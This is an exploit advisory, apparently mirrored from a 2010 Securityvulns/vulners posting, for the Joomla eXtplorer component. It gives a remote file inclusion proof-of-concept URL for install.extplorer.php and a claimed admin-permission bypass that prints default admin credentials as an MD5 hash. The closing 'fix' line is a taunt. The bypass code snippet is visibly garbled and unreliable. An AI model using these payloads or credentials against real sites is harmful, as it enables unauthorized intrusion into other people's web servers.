Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23440
HistoryMar 23, 2010 - 12:00 a.m.

Joomla component com_extplorer_2.0.1_pt-BR <= Multiple Vulnerability exploits

2010-03-2300:00:00
vulners.com
32

#################################################################
Joomla component com_extplorer_2.0.1_pt-BR <= Multiple Vulnerability
exploits
#################################################################

Link: http://joomlacode.org/gf/project/joomlaxplorer
Version: 2.0.1_pt-BR
Project: http://sourceforge.net/projects/extplorer
License: GPL/MPL

#################################################################

Author: eidelweiss
Date: 2010/03/23 9:50 AM (GMT+7)
Contact: eidelweiss[at]cyberservices[dot]com
Thanks: JosS (hack0wn) - r0073r & 0x1D (inj3ct0r) - LeQhi - aRiee -
idiot_inside - kuris
Special: AL-MARHUM - [D]eal [C]yber - syabilla_putri (miss u)
Dedicat: psychotic_girls (dodol gue td lg sarapan , nih hasil gue coding
pas nungguin loe td)

#################################################################
RFI
#################################################################
-=[ BUG ]=-

[+] install.extplorer.php

-=[ VULN ]=-

    require_once&#40;$mypath . &quot;/include/functions.php&quot;&#41;;
    require_once&#40;$mypath . &quot;/libraries/Archive/archive.php&quot;&#41;;

-=[ P0C ]=-

    ../administrator/components/com_extplorer/install.extplorer.php?mypath=

[inj3ct0r]
#################################################################
bypass admin permision
#################################################################
Users can be defined by using the Admin-section

$GLOBALS["users"]=array
($_SERVER['DOCUMENT_ROOT'])?realpath(dirname(FILE).'/…'):$_SERVER['DOCUMENT_ROOT'],"http://localhost",1,"",7,1),
user: admin
pass: 21232f297a57a5a743894a0e4a801fc3 // md5
#################################################################
[ FIX ] Use Your Skill and Play Your Imagination
#################################################################
#################################################################